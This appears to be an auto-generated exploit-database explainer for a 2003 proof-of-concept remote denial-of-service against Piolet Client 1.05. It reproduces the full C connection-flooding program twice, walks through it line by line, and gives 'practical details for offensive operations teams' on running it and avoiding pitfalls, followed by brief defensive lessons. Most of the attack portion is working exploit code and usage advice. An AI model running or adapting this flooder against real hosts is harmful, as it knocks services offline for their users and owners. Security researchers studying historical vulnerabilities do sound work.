By exploitdb papers bot•August 20, 2003•

papers

Piolet Client 1.05 Remote Denial of Service Explained

What this paper is

This paper presents a proof-of-concept (PoC) exploit for a remote Denial of Service (DoS) vulnerability in Piolet Client version 1.05. The exploit aims to crash the Piolet Client application by overwhelming it with connection attempts. It was published by Luca Ercoli in 2003.

Simple technical breakdown

The exploit works by repeatedly trying to establish network connections to a target machine running Piolet Client. It does this very rapidly and in a way that the Piolet Client application cannot handle. By sending a large number of connection requests in a short period, the exploit exhausts the resources of the Piolet Client, causing it to become unresponsive or crash, thus achieving a Denial of Service.

The core idea is to exploit a weakness in how the Piolet Client handles incoming network connections. Instead of gracefully rejecting or managing excessive connections, it appears to falter under the load.

Complete code and payload walkthrough

Let's break down the provided C code.

/************************************************************
*                      Piolet client v1.05 Remote Denial of Service                    *
*               Proof of Concept by Luca Ercoli  luca.ercoli[at]inwind.it             *
************************************************************/

#include <stdio.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>

int ck,port=701,sd,cx=0,contatore=0,prec;

struct sockaddr_in pilot_client;

void ending(char *client){

int i;

pilot_client.sin_family = AF_INET;
pilot_client.sin_port = htons((u_short)port);
pilot_client.sin_addr.s_addr = (long)inet_addr(client);


for(i = 0; i < 100; i++){

sd = socket(AF_INET, SOCK_STREAM, 0);
ck = connect(sd, (struct sockaddr *) &pilot_client, sizeof(pilot_client));


if(ck != 0) {

prec = 0;

if (prec == 0) contatore++;
if (prec == 1) contatore = 0;

if (contatore > 13) {
printf("! Remote client seems to be crashed.\n");
exit(0);
}

}

if(ck == 0) prec = 1;

  close(sd);
}

}

void kill_pilot(char *stringa){

short i;

  pilot_client.sin_family = AF_INET;
  pilot_client.sin_port = htons((u_short)port);
  pilot_client.sin_addr.s_addr = (long)inet_addr(stringa);

for(i = 0; i < 50; i++){

sd = socket(AF_INET, SOCK_STREAM, 0);
ck = connect(sd, (struct sockaddr *) &pilot_client, sizeof(pilot_client));


if(ck != 0) exit(0);

close(sd);

}

}

int main(int argc, char **argv)
{

short i;

 prec = 0;

  if(argc < 2)
  {
    printf("\nUsage: %s <client-ip>\n", argv[0]);
    exit(0);
  }

prec=0;

printf ("\n\n+ DoS Started...\n");
printf("+ Flooding remote client...\n");

for (i=0; i<12; i++)  if(!fork()) kill_pilot(argv[1]);

printf ("+ Ending...\n");

ending(argv[1]);

}

// milw0rm.com [2003-08-20]

Global Variables:

ck: An integer to store the return value of connect().
port: An integer, initialized to 701. This is the target port for the Piolet Client.
sd: An integer to store the socket descriptor.
cx: An integer, initialized to 0. Its purpose is unclear in the provided code, as it's never used.
contatore: An integer, initialized to 0. Used in the ending function to count connection failures.
prec: An integer, initialized to 0. Used in both ending and main to track previous connection states.

struct sockaddr_in pilot_client;

This is a standard structure used for IPv4 network addresses. It will hold the target IP address and port.

void ending(char *client) function:

Purpose: This function is designed to repeatedly attempt connections to the target and, if connections fail, increment a counter. If the counter exceeds a threshold, it declares the client crashed and exits.
Inputs: client (a character pointer, expected to be a string representing the target IP address).
Behavior:
- Initializes pilot_client structure:
  - pilot_client.sin_family = AF_INET;: Sets the address family to IPv4.
  - pilot_client.sin_port = htons((u_short)port);: Sets the target port, converting it to network byte order.
  - pilot_client.sin_addr.s_addr = (long)inet_addr(client);: Converts the IP address string to a network address and stores it.
- Loop (for(i = 0; i < 100; i++)): This loop runs 100 times.
  - sd = socket(AF_INET, SOCK_STREAM, 0);: Creates a new TCP socket.
  - ck = connect(sd, (struct sockaddr *) &pilot_client, sizeof(pilot_client));: Attempts to connect to the target IP and port.
  - if(ck != 0) block (Connection Failed):
    - prec = 0;: Resets prec to 0.
    - if (prec == 0) contatore++;: Increments contatore because prec is 0. This means a failed connection increments the counter.
    - if (prec == 1) contatore = 0;: This condition will never be met because prec is reset to 0 just before this. It seems like a remnant or logical error.
    - if (contatore > 13): If contatore exceeds 13 (meaning 14 consecutive failed connection attempts, or more if prec was ever 1), it prints a message and exits the program.
  - if(ck == 0) block (Connection Succeeded):
    - prec = 1;: Sets prec to 1, indicating a successful connection in the previous iteration (though this state is not fully utilized for resetting contatore due to the logic described above).
  - close(sd);: Closes the socket, regardless of connection success or failure.
Output: Prints a message and exits if the target is deemed crashed.

void kill_pilot(char *stringa) function:

Purpose: This function attempts to establish 50 TCP connections to the target. If any connection fails, it immediately exits the function.
Inputs: stringa (a character pointer, expected to be a string representing the target IP address).
Behavior:
- Initializes pilot_client structure similarly to ending.
- Loop (for(i = 0; i < 50; i++)): This loop runs 50 times.
  - sd = socket(AF_INET, SOCK_STREAM, 0);: Creates a new TCP socket.
  - ck = connect(sd, (struct sockaddr *) &pilot_client, sizeof(pilot_client));: Attempts to connect to the target.
  - if(ck != 0) exit(0);: If the connection fails (ck is not 0), the entire program exits. This is a critical point: this function is designed to only proceed if all 50 connections succeed.
  - close(sd);: Closes the socket.
Output: Exits the program if any connection attempt fails.

int main(int argc, char **argv) function:

Purpose: The main entry point of the program. It handles command-line arguments, initiates multiple child processes to flood the target, and then calls the ending function.
Inputs: argc (argument count), argv (argument vector).
Behavior:
- short i;: Declares a loop counter.
- prec = 0;: Initializes prec.
- Argument Check (if(argc < 2)):
  - If fewer than 2 arguments are provided (meaning no target IP address), it prints a usage message and exits.
- prec=0;: Resets prec again (redundant here).
- Prints "DoS Started..." and "Flooding remote client...".
- Forking Loop (for (i=0; i<12; i++) if(!fork()) kill_pilot(argv[1]);):
  - This loop runs 12 times.
  - fork(): Creates a new child process.
  - if(!fork()): This condition is true in the child process.
  - kill_pilot(argv[1]);: The child process calls kill_pilot with the target IP address provided as the first command-line argument (argv[1]). This means 12 child processes are spawned, each attempting to make 50 connections to the target.
- Prints "Ending...".
- ending(argv[1]);: The parent process (and any child processes that complete kill_pilot without exiting) calls the ending function to perform the final connection attempts and check for the crash.
Output: Prints status messages and initiates the DoS attack.

Mapping list:

#include <stdio.h>: Standard input/output functions (like printf).
#include <string.h>: String manipulation functions (not heavily used here, but good practice).
#include <netinet/in.h>: Definitions for internet domain sockets (like sockaddr_in, htons, inet_addr).
#include <sys/socket.h>: Socket programming functions (like socket, connect, close).
#include <sys/types.h>: Basic system data types.
int ck,port=701,sd,cx=0,contatore=0,prec;: Global variables for socket descriptors, port, connection status, and counters.
struct sockaddr_in pilot_client;: Structure to hold target IP and port.
void ending(char *client): Function to perform final connection attempts and detect crash.
void kill_pilot(char *stringa): Function to perform initial rapid connection attempts.
int main(int argc, char **argv): Main function, argument parsing, process forking, and orchestrating the attack.
if(argc < 2): Checks if a target IP address was provided.
if(!fork()) kill_pilot(argv[1]);: Creates 12 child processes, each running kill_pilot.
ending(argv[1]);: The final phase of the attack to detect the crash.
contatore > 13: Threshold for detecting a crash in the ending function.

Practical details for offensive operations teams

Required Access Level: Network access to the target IP address is required. No prior authentication or local access on the target is needed.
Lab Preconditions:
- A Linux/Unix-like environment to compile and run the C exploit code.
- Network connectivity to the target IP address on port 701.
- A target machine running Piolet Client v1.05 (or a similarly vulnerable version) on port 701.
- A controlled lab environment is highly recommended for testing and ensuring the exploit functions as expected without unintended consequences.
Tooling Assumptions:
- A C compiler (like GCC) to build the exploit.
- Standard networking utilities.
Execution Pitfalls:
- Network Latency/Packet Loss: High latency or significant packet loss between the attacker and target can reduce the effectiveness of the rapid connection attempts. The exploit relies on overwhelming the target quickly.
- Firewalls/Intrusion Detection Systems (IDS): Network firewalls or IDS might detect and block the high volume of connection attempts, preventing the exploit from reaching the target.
- Target System Resources: If the target system is very powerful or has robust network stack handling, it might withstand the initial flood.
- Port: The exploit is hardcoded to port 701. If Piolet Client is running on a different port, the exploit will fail.
- Vulnerability Patching: If Piolet Client v1.05 has been patched or a different version is in use, the vulnerability will not be present.
- kill_pilot Exit Condition: The kill_pilot function exits the entire program if any of its 50 connection attempts fail. This means if the target is already somewhat unstable or a single connection attempt is dropped, the initial flooding phase might be cut short prematurely.
- ending function logic: The contatore logic in ending is slightly peculiar. It increments on connection failure (ck != 0). The if (prec == 1) contatore = 0; line is unreachable because prec is reset to 0 just before. This means contatore only ever increments and never resets within the loop, making the contatore > 13 check effectively a count of failed connections within the 100 attempts.
- fork() behavior: The fork() system call can have nuances. If the system is under heavy load, fork() might fail or be slow. The if(!fork()) ensures only child processes execute kill_pilot. The parent process continues to ending.

Where this was used and when

This exploit was published in August 2003. At that time, Piolet Client was likely in use by individuals or organizations that communicated using its proprietary protocol. Exploits of this nature were common in the early to mid-2000s, targeting vulnerabilities in network services that lacked robust handling of high connection volumes. Specific instances of its use in real-world attacks are not detailed in the paper itself, but it represents a common type of DoS attack prevalent in that era.

Defensive lessons for modern teams

Rate Limiting and Connection Throttling: Implement mechanisms on network devices and application servers to limit the number of new connections from a single source within a given time frame.
Resource Management: Ensure applications have adequate resources (CPU, memory, network buffers) and are designed to gracefully handle high connection loads. Implement connection timeouts and queue management.
Input Validation and Protocol Robustness: Applications should validate incoming data and handle malformed or unexpected network traffic gracefully, rather than crashing.
Regular Patching and Updates: Keep all software, including client applications and network services, updated to the latest secure versions.
Network Segmentation and Firewalls: Use firewalls to restrict access to necessary ports and services. Network segmentation can limit the blast radius of an attack.
Intrusion Detection/Prevention Systems (IDS/IPS): Deploy IDS/IPS to monitor for and block suspicious traffic patterns, such as a sudden surge of connection attempts.
Application-Level DoS Protection: Consider specialized application-level DoS protection solutions that can identify and mitigate sophisticated application-layer attacks.

ASCII visual (if applicable)

This exploit is primarily a network flood. A simple visual representation of the attack flow:

+-----------------+       +-----------------+       +-----------------+
| Attacker Machine| ----> | Network Traffic | ----> | Target Piolet   |
| (Exploit Code)  |       | (Connection     |       | Client v1.05    |
+-----------------+       | Attempts)       |       | (Port 701)      |
                          +-----------------+       +--------+--------+
                                                             |
                                                             | (Resource Exhaustion)
                                                             |
                                                             v
                                                       +-----------------+
                                                       | Application     |
                                                       | Crash / Hang    |
                                                       +-----------------+

Source references

PAPER ID: 82
PAPER TITLE: Piolet Client 1.05 - Remote Denial of Service
AUTHOR: Luca Ercoli
PUBLISHED: 2003-08-20
KEYWORDS: Windows,dos
PAPER URL: https://www.exploit-db.com/papers/82
RAW URL: https://www.exploit-db.com/raw/82

Original Exploit-DB Content (Verbatim)

/************************************************************
*                      Piolet client v1.05 Remote Denial of Service                    *
*               Proof of Concept by Luca Ercoli  luca.ercoli[at]inwind.it             *
************************************************************/

#include <stdio.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>

int ck,port=701,sd,cx=0,contatore=0,prec;

struct sockaddr_in pilot_client;

void ending(char *client){

int i;

pilot_client.sin_family = AF_INET;
pilot_client.sin_port = htons((u_short)port);
pilot_client.sin_addr.s_addr = (long)inet_addr(client);


for(i = 0; i < 100; i++){

sd = socket(AF_INET, SOCK_STREAM, 0);
ck = connect(sd, (struct sockaddr *) &pilot_client, sizeof(pilot_client)); 


if(ck != 0) { 

prec = 0;

if (prec == 0) contatore++;
if (prec == 1) contatore = 0;

if (contatore > 13) {
printf("! Remote client seems to be crashed.\n");
exit(0);
}

}
 
if(ck == 0) prec = 1;

  close(sd);
}

}

void kill_pilot(char *stringa){

short i;

  pilot_client.sin_family = AF_INET;
  pilot_client.sin_port = htons((u_short)port);
  pilot_client.sin_addr.s_addr = (long)inet_addr(stringa);
   
for(i = 0; i < 50; i++){

sd = socket(AF_INET, SOCK_STREAM, 0);
ck = connect(sd, (struct sockaddr *) &pilot_client, sizeof(pilot_client)); 


if(ck != 0) exit(0);

close(sd);

}

}

int main(int argc, char **argv)
{

short i;

 prec = 0;

  if(argc < 2)
  { 
    printf("\nUsage: %s <client-ip>\n", argv[0]);
    exit(0);
  }
  
prec=0;

printf ("\n\n+ DoS Started...\n");
printf("+ Flooding remote client...\n");

for (i=0; i<12; i++)  if(!fork()) kill_pilot(argv[1]);

printf ("+ Ending...\n");

ending(argv[1]);
  
}

// milw0rm.com [2003-08-20]